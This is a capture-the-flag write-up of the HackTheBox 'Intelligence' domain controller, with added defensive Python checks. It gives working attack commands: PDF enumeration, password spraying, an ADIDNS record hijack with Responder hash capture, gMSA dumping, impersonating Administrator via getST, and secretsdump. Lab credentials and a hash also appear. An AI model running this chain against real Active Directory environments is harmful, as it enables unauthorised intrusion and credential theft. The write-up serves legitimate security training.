Basic information

Port scan

A standard domain environment, intelligence.htb:

$ nmap -sC -sV -Pn 10.10.10.248

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 14:33 CST
Nmap scan report for 10.10.10.248
Host is up (0.075s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 13:34:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-05T13:35:23
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.56 seconds

80

The website offers some documents for download, and their names follow a very regular pattern:

PDFs

Following the PDF naming pattern, further files can be discovered:

Usernames are extracted from these PDFs:

The PDFs contain a lot of text; extracting it and filtering on keywords yields an initial password:

NewIntelligenceCorpUser9876
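The writeup does not show how the usernames were pulled from the PDFs; on this box they sit in the document metadata (the Creator field). The following is an added example, not code from the writeup, that shows the leak from the publishing side: it finds such entries in a constructed sample PDF and blanks them before the file would go on the web server.

```python
# Added illustration for this writeup, not the box's or the author's code: find
# and blank out username-revealing entries in a PDF's Info dictionary. Only
# uncompressed Info dictionaries with literal (...) strings are handled, which
# is enough to show the leak; exiftool or pdfminer cover the other encodings.
import re

# Metadata keys that commonly carry an account or person name.
LEAKY_KEYS = ("Author", "Creator", "Producer", "Title")
_ENTRY = re.compile(rb"/(" + b"|".join(k.encode() for k in LEAKY_KEYS) + rb")\s*\(([^)]*)\)")

def find_metadata(pdf: bytes) -> dict:
    """Return the leaky Info-dictionary entries found in raw PDF bytes."""
    return {k.decode(): v.decode("latin-1") for k, v in _ENTRY.findall(pdf)}

def looks_like_username(value: str) -> bool:
    """First.Last with no spaces, the pattern the usernames on this box follow."""
    return re.fullmatch(r"[A-Z][a-z]+\.[A-Z][a-z]+", value) is not None

def leaked_usernames(pdf: bytes) -> list:
    """Usernames a visitor could harvest from the document's metadata."""
    return sorted(v for v in find_metadata(pdf).values() if looks_like_username(v))

def strip_metadata(pdf: bytes) -> bytes:
    """Blank the leaky entries so the file can be published without them."""
    return _ENTRY.sub(lambda m: b"/" + m.group(1) + b" ()", pdf)

# Constructed minimal PDF: only the Info dictionary matters for this check.
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog >> endobj\n"
              b"2 0 obj << /Creator (Tiffany.Molina) /Producer (Microsoft Word)\n"
              b"   /Title (Internal Memo) >> endobj\n"
              b"trailer << /Root 1 0 R /Info 2 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    print(leaked_usernames(SAMPLE_PDF))                   # ['Tiffany.Molina']
    print(leaked_usernames(strip_metadata(SAMPLE_PDF)))   # []
```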

kerbrute

kerbrute confirms that all of these usernames are valid; no format transformation is needed:

usernames

Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee

scan.py

#!/usr/bin/python3

import os
import requests

url = 'http://intelligence.htb/documents/'

# Create the download directory once, not on every hit
os.makedirs('pdf', exist_ok=True)

for i in range(2020, 2022):
    for j in range(1, 13):
        for k in range(1, 32):  # days 1-31 (the original loop stopped at 30)
            date = f'{i}-{j:02}-{k:02}-upload.pdf'
            r = requests.get(url + date)
            if r.status_code == 200:
                print(date)
                # save the body already fetched instead of shelling out to wget
                with open(f'pdf/{date}', 'wb') as f:
                    f.write(r.content)

extract_text.py

#!/usr/bin/python3

from pdfminer.high_level import extract_text

files = ['2020-01-01-upload.pdf', '2020-01-02-upload.pdf', '2020-01-04-upload.pdf', '2020-01-10-upload.pdf', '2020-01-20-upload.pdf', '2020-01-22-upload.pdf', '2020-01-23-upload.pdf', '2020-01-25-upload.pdf', '2020-01-30-upload.pdf', '2020-02-11-upload.pdf', '2020-02-17-upload.pdf', '2020-02-23-upload.pdf', '2020-02-24-upload.pdf', '2020-02-28-upload.pdf', '2020-03-04-upload.pdf', '2020-03-05-upload.pdf', '2020-03-12-upload.pdf', '2020-03-13-upload.pdf', '2020-03-17-upload.pdf', '2020-03-21-upload.pdf', '2020-04-02-upload.pdf', '2020-04-04-upload.pdf', '2020-04-15-upload.pdf', '2020-04-23-upload.pdf', '2020-05-01-upload.pdf', '2020-05-03-upload.pdf', '2020-05-07-upload.pdf', '2020-05-11-upload.pdf', '2020-05-17-upload.pdf', '2020-05-20-upload.pdf', '2020-05-21-upload.pdf', '2020-05-24-upload.pdf', '2020-05-29-upload.pdf', '2020-06-02-upload.pdf', '2020-06-03-upload.pdf', '2020-06-04-upload.pdf', '2020-06-07-upload.pdf', '2020-06-08-upload.pdf', '2020-06-12-upload.pdf', '2020-06-14-upload.pdf', '2020-06-15-upload.pdf', '2020-06-21-upload.pdf', '2020-06-22-upload.pdf', '2020-06-25-upload.pdf', '2020-06-26-upload.pdf', '2020-06-28-upload.pdf', '2020-06-30-upload.pdf', '2020-07-02-upload.pdf', '2020-07-06-upload.pdf', '2020-07-08-upload.pdf', '2020-07-20-upload.pdf', '2020-07-24-upload.pdf', '2020-08-01-upload.pdf', '2020-08-03-upload.pdf', '2020-08-09-upload.pdf', '2020-08-19-upload.pdf', '2020-08-20-upload.pdf', '2020-09-02-upload.pdf', '2020-09-04-upload.pdf', '2020-09-05-upload.pdf', '2020-09-06-upload.pdf', '2020-09-11-upload.pdf', '2020-09-13-upload.pdf', '2020-09-16-upload.pdf', '2020-09-22-upload.pdf', '2020-09-27-upload.pdf', '2020-09-29-upload.pdf', '2020-09-30-upload.pdf', '2020-10-05-upload.pdf', '2020-10-19-upload.pdf', '2020-11-01-upload.pdf', '2020-11-03-upload.pdf', '2020-11-06-upload.pdf', '2020-11-10-upload.pdf', '2020-11-11-upload.pdf', '2020-11-13-upload.pdf', '2020-11-24-upload.pdf', '2020-11-30-upload.pdf']
# keywords = ['user', 'username', 'pass', 'password']
keyword = 'user'

for i in files:
    text = extract_text('pdf/' + i)
    if keyword in text:  # crude, case-sensitive filter
        print(i)
        print(text)

SMB

crackmapexec

Using the usernames and the password obtained, one valid account is found:

crackmapexec smb intelligence.htb -u user.txt -p NewIntelligenceCorpUser9876

intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

smb share

Enumerate the SMB shares:

user flag

The SMB shares include Users, and user.txt is on the Desktop of Tiffany.Molina's user directory:

Information

The IT share contains a PowerShell file; its contents reveal a scheduled task that runs every 5 minutes and checks the status of web* hosts:

So if we can add a DNS record pointing to our own machine, we can use Responder to capture the Ted.Graves user's hash.
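The hijack works because, by default, any authenticated domain user can create ADIDNS records, and the task resolves whatever web* name it finds. As an added example (not part of the original writeup), the following check flags web* A records that point outside the expected network or are owned by an ordinary user; the zone listing, trusted network and trusted owners are constructed assumptions.

```python
# Added illustration for this writeup, not the box's own tooling: flag ADIDNS
# records that would redirect the IT share's web* health check. The zone
# listing, trusted network and trusted owners are constructed assumptions.
import fnmatch
import ipaddress

# Assumption: where the web* hosts polled by the scheduled task should live.
TRUSTED_NETS = [ipaddress.ip_network("10.10.10.0/24")]
# Assumption: principals expected to own dnsNode objects in the zone.
TRUSTED_OWNERS = {"INTELLIGENCE\\Domain Admins", "INTELLIGENCE\\DC$"}
# Wildcard the scheduled task resolves every five minutes (from the writeup).
POLLED_PATTERN = "web*"

# Constructed zone listing: (name, type, address, owner of the dnsNode object).
# The weboops entry mirrors the record added with dnstool in the writeup.
SAMPLE_ZONE = [
    ("dc",      "A", "10.10.10.248", "INTELLIGENCE\\Domain Admins"),
    ("webdev",  "A", "10.10.10.50",  "INTELLIGENCE\\Domain Admins"),
    ("weboops", "A", "10.10.14.11",  "INTELLIGENCE\\Tiffany.Molina"),
]

def is_trusted(addr: str) -> bool:
    """True when the address falls inside one of the trusted networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_NETS)

def suspicious_records(zone: list) -> list:
    """Return (name, address, reasons) for web* A records worth investigating.

    Any authenticated user can normally create ADIDNS records, so a polled
    name pointing outside the trusted range, or owned by an ordinary user,
    is exactly the hijack described above.
    """
    flagged = []
    for name, rtype, addr, owner in zone:
        if rtype != "A" or not fnmatch.fnmatch(name.lower(), POLLED_PATTERN):
            continue
        reasons = []
        if not is_trusted(addr):
            reasons.append("address outside trusted networks")
        if owner not in TRUSTED_OWNERS:
            reasons.append("owned by " + owner)
        if reasons:
            flagged.append((name, addr, reasons))
    return flagged

if __name__ == "__main__":
    for name, addr, reasons in suspicious_records(SAMPLE_ZONE):
        print(f"{name} -> {addr}: {'; '.join(reasons)}")
```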

Ted.Graves

dnstool

Using the dnstool.py included there, add a DNS record:

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.11 10.10.10.248

Then wait for the scheduled task to run and obtain the Ted.Graves user's hash:

Cracking the hash yields the Ted.Graves user's password:

Mr.Teddy         (Ted.Graves)

responder

sudo python ~/Tools/Responder/Responder.py -I utun2 -i 10.10.14.11 -A -v

[HTTP] Sending NTLM authentication request to 10.10.10.248
[HTTP] GET request from: 10.10.10.248 URL: /
[HTTP] Host : weboops
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:EDCC3A25B7BF1CD7CD0DA243D3C47BB3:0101000000000000DA87A000AC71D7014E8553B060A5D4E9000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000000092A515C8ADAC1F751188FB938EF6F4FBDDB167339C23CBB4BACACA397E43350A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

LDAP

Using the credentials already obtained, continue enumerating LDAP to get the gMSA password:

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

Silver ticket

With the service account's hash in hand, a silver ticket can be attempted, but a direct attempt fails with an error: the clock skew is too great:

python3 ~/Tools/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator

ntpdate

A very common problem; synchronising the time fixes it:

sudo apt-get install ntpdate
sudo ntpdate 10.10.10.248

secretsdump

The generated ticket can then be used for all kinds of operations, for example secretsdump:

root flag

After that, pass-the-hash gives a SYSTEM shell, and root.txt can be read:

References